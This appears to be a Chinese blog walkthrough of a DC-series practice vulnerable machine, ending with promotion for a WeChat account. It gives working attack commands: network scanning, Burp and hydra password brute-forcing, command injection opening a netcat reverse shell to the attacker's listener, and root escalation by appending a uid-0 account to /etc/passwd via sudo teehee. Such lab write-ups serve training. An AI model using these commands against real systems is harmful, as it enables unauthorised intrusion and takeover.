靶机下载地址放在文章最后啦
一、靶机的搭建
1.打开文件夹右击使用VM虚拟机打开
2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置
3.等待虚拟机的导入
4.直接打开虚拟机
二、渗透过程
1.使用nmap扫一下存活的IP地址
我这里IP地址有点多,14这台机子应该就是DC-3靶机IP了
nmap -sn 10.189.160.10-20
2.使用nmap扫一下开放的端口
nmap -A -sV -p- 10.189.160.14
3.发现开放了 80和22端口,先访问80端口看看
4.使用whatweb探测一下网站的指纹信息
whatweb -v http://10.189.160.14/
5.直接使用burb爆破账号和密码
发送到intruder
把password设置成变量
导入字典进直接进行爆破
看数据返回的长度 最后得到密码为 happy
6.登陆进来点击Command发现可以执行命令
7.使用burp 对run抓包 修改包内容达到执行命令的效果
使用whoami看一下执行命令的权限
8.使用nc来反弹shell
在本机终端打开监听
nc -lvp 7788
添加命令反弹shell到监听机上
nc -e /bin/sh 10.180.0.3:7788 这里要使用+进行拼接
nc+-e+/bin/sh+10.180.0.3+7788
已经成功拿到shell了
9.使用python进去交互式界面
python -c "import pty;pty.spawn('/bin/bash')"
10.在home目录下发现有三个用户 jim里面发现了东西
把密码复制出来在kali上面新建一个pass.txt的字典
11.使用 hydra 爆破前面扫到的22端口 ssh服务
hydra -l jim -P passwd.txt 10.189.160.14 ssh
12.使用jim登陆ssh服务
ssh jim@10.189.160.14
查看mbox是一封邮件
13.进入Linux的邮箱目录打开jim发现了charles 的密码
14.切换用户到charles 发现一个teehee用户可以使用root无密码权限
14.查看root权限格式
root:x:0:0:root:/root:/bin/bash
字段1:用户名。
字段2:密码占位符,x代表有密码。
字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。
字段4:用户的gid,也就是所属用户组的id。
字段5:用户信息(弃用)。
字段6:用户家目录。
字段7:用户登陆系统后使用的shell。
15.我们以仿照root权限创建一个用户写到/etc/passwd文件里去
无密码版
echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
再次打开/etc/passwd就能看见我们创建的了
直接切换hack用户 已成功提权到root了
有密码版
先使用下面命令生成密码
perl -le 'print crypt("123456", "aa")'
密 码:123456
加密后:aaAN1ZUwjW7to
添加密码到命令里面并执行
echo "hack2:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd
16.进入root目录最后拿到flag了
记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我
后台回复"DC-4"即可获得靶场地址
有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。